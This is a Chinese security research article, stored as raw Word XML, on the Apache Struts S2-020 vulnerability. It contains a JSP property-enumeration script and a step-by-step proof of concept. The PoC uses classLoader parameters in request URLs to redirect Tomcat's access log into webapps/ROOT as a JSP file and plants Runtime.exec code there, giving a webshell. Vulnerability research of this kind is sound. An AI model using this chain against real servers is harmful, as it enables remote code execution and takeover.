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 w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Struts S2-020</w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>这个通告已经公布有一段时间了。目前大家都知道这个漏洞可以造成</w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>、文件下载等危害，相信各大厂商也已经采取了相应的安全措施。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今天是和大家分享一下对这个漏洞的一点研究，包括如何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omcat 8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下导致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CE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目的是抛砖引玉，有不足之处欢迎大家指出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009806D7" w:rsidRPr="009806D7" w:rsidRDefault="009806D7" w:rsidP="009806D7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="450" w:after="225"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>1.属性列举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这个漏洞分析的一个难点在于：通过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ogn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lass.xx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这种方式来遍历属性时，得到的是实际运行环境中的动态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lass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因此仅作静态分析是很困难的。例如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lassLoader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在不同容器中就各不相同。于是我编写了一个小脚本来自动枚举这样的属性：（这段脚本只考虑了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in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、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in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与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boolean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这些基本属性，未考虑数组等复杂的情况，实际情况下结果会更多）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%@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age languag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java"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mpor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java.lang.reflect.*"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%&gt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%!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public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voi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rocess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Object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instan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java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ervl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jsp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JspWriter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ou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uti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HashSet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tring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o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ry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?&gt;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c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instan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add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instan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Method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[]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allMethods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Method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for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Metho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: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allMethod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!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tartsWi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set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!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oGeneric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tartsWi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public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?&gt;[]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Type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ParameterTyp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eng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!=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1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[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0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]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qual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java.lang.String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||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p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[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0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]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qual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boolean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||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p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[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0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]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qual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int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tring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fieldNam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b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3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4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oLowerCas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+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b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4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ou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i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o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+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.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+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eldNam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+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&lt;br&gt;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for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Metho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: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allMethod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!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tartsWi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get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!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oGeneric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tartsWi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public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?&gt;[]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Type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ParameterTyp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ength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!=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0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Return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Void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YP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Object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o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invok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instan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o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!=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nul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ain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o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ontin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process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o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ou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o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+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.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+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b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3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4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oLowerCas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+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bstri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4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;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atch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io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IOException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intStackTra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atch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a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IllegalAccessException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intStackTra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atch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an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flec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InvocationTargetException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  <w:t>    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intStackTrac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ab/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%&gt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%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uti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HashSet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set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new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java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uti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Hash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Objec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gt;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tring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poc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class.classLoader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xampl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HelloWorl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action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new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exampl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HelloWorld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ocess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action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ou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e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,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o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%&gt;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omcat 8.0.3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下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2.3.16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blank app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中执行这段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jsp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输出结果如下：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br/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（省略部分非相关属性）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ncoding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irectory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heckExists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lastRenderedPageBreak/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nameOnRotate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leDateFormat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efix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able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buffer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ffix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ocale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questAttributesEnabl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nabl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ditionUnless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ditionIf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ttern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dition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asyncSupport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omain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asyncSupport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omain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asyncSupported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n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omain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.....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这意味着Tomcat 8下至少有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200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多个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boolean、in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或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in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类型的属性是可以操纵的，虽然可修改不一定会产生危害，但至少说明这个漏洞的潜在风险不小。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009806D7" w:rsidRPr="009806D7" w:rsidRDefault="009806D7" w:rsidP="009806D7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="225" w:after="225"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2.POC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lastRenderedPageBreak/>
        <w:t>经过分析发现，通过下面的方法可以造成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webshel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的效果，最终导致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omcat下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CE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。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br/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上面的属性中，有几个控制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omca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上生成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ccess lo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的文件名，其默认值如下：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irectory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ogs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refix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localhost_access_log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uffix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xt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leDateFormat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yyyy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-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m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-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d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 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默认情况下，生成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ccess lo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位于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 logs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目录（与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webapps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平行）下，文件名是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localhost_access_log.2014-03-09.tx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但通过修改上面的属性值，可以导致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webapps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目录下写入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jspwebshel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。具体步骤如下（以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truts 2.3.16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下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blank app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为例）：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1.访问下面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ur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来改变属性：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http://127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT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http://127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.prefix=shell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http://127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp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2.访问下面的url来触发tomcat切换log（这里有个坑，这个属性必须是数字,这里设定为1），那么从此开始tomcat的access log将被记录入 webapps/ROOT/shell1.jsp中：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>http://127.0.0.1/struts2-blank/example/HelloWorld.action?class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=1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3.通过发包访问下面的请求，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access lo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中植入代码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http://127.0.0.1/struts2-blank/example/aaaa.jsp?a=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%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Runti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getRunti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.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exec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calc"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%&gt;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访问上述请求后，就可以看到生成了webapps/ROOT/shell1.jsp，内容如下：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center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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6572250" cy="838200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="http://image.3001.net/images/ue/36481396754175.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId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3001.net/images/ue/36481396754175.jpg">
                      <a:hlinkClick r:id="rId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4.结合前面设定的参数，访问下面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ur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观察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hell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执行</w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>http://127.0.0.1/shell1.jsp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/>
          <w:noProof/>
          <w:color w:val="069AEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="12122150" cy="4597400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="http://image.3001.net/images/ue/74681396754177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3001.net/images/ue/74681396754177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通过分析，上面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POC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中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class.classLoader.resources.context.parent.pipeline.firs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这个属性实际是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org.apache.catalina.valves.AccessLogValve，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在conf/server.xml里面有一段相关的配置：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93A1A1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lt;!-- Access log processes allexample.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93A1A1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             Documentation at:/docs/config/valve.html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             Note: The pattern used isequivalent to using pattern="common" --&gt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</w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;ValveclassNa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org.apache.catalina.valves.AccessLogValve"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directory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logs"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 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prefi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localhost_access_log"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uffix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.txt"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  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pattern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DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"%h %l %u %t&amp;quot;%r&amp;quot; %s %b"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333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/&gt;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为何修改了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ataforma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会触发切换日志呢？注意下面一个属性，默认是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rue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clas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lassLoad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esource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ontex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aren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ipelin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rs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able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每次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Log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时，都会调用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otate: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publicvoid log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CharArrayWriter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messag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…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而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rotate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是检查当前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systime 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经过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forma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后，与当前的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tsDate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是否相同。如果日期不同了，自然需要切换日志文件了：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public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voi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rotat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abl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long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systim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ystem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currentTimeMill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ystim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-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ionLastChecked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gt;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1000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synchronized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ystim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-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ionLastChecked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&gt;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195F91"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1000L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rotationLastChecked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systi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String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tsDate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ileDateFormatter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format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new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008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Dat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systim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if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!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ateStamp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equal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tsDat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){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  clos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ru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  </w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="1E347B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>this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.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dateStamp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=</w:t>
      </w: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tsDate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    open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();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lastRenderedPageBreak/>
        <w:t>        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/>
          <w:color w:val="48484C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300" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="48484C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="93A1A1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}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/>
          <w:color w:val="585858"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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而我们之前已经修改了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dateFormat</w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="585858"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>，所以就触发了日志切换。这个特性与具体的OS无关，是tomcat代码决定的。在linux与windows下证实该问题均存在。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009806D7" w:rsidRPr="009806D7" w:rsidRDefault="009806D7" w:rsidP="009806D7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="225" w:after="225"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>3.后记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这个POC距离实际的攻击还有一定的距离，发表此文仅供技术研究使用，请勿用于实际攻击。另外，也许还有其他的利用方式，Tomcat 8下那么多的可操控的属性，或许有别的也可以RCE？其他的容器下，是否也有这么多的可操控属性呢？欢迎感兴趣的同学与我们BSRC的同学讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009806D7" w:rsidRPr="009806D7" w:rsidRDefault="009806D7" w:rsidP="009806D7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="150" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/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</w:pP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 xml:space="preserve">[via </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:tooltip="" w:history="1">
        <w:r w:rsidRPr="009806D7">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="069AEF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>sec.baidu.com</w:t>
        </w:r>
      </w:hyperlink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 作者：</w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>neobyte</w:t>
      </w:r>
      <w:r w:rsidRPr="009806D7">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="585858"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>]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00" w:rsidRDefault="00231A00" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00231A00" w:rsidRDefault="00231A00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9806D7">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>9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9806D7">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>9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00" w:rsidRDefault="00231A00" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00231A00" w:rsidRDefault="00231A00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31A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231A00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31A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F66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31A00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06D7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76F66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ADD7E37-FB52-4AEE-8187-C0EFAB4C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9806D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806D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06D7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806D7"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体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9806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806D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80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06D7"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pln">
    <w:name w:val="pln"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="str">
    <w:name w:val="str"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kwd">
    <w:name w:val="kwd"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="typ">
    <w:name w:val="typ"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="lit">
    <w:name w:val="lit"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009806D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806D7"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="com">
    <w:name w:val="com"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="tag">
    <w:name w:val="tag"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="atv">
    <w:name w:val="atv"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009806D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="atn">
    <w:name w:val="atn"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0098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3001.net/images/ue/63911396754080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c.baidu.com/index.php?research/detail/id/18&amp;qq-pf-to=pcqq.grou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mage.3001.net/images/ue/74681396754177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8D13-BD27-43EA-8B23-8D14377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5T16:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-05T16:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>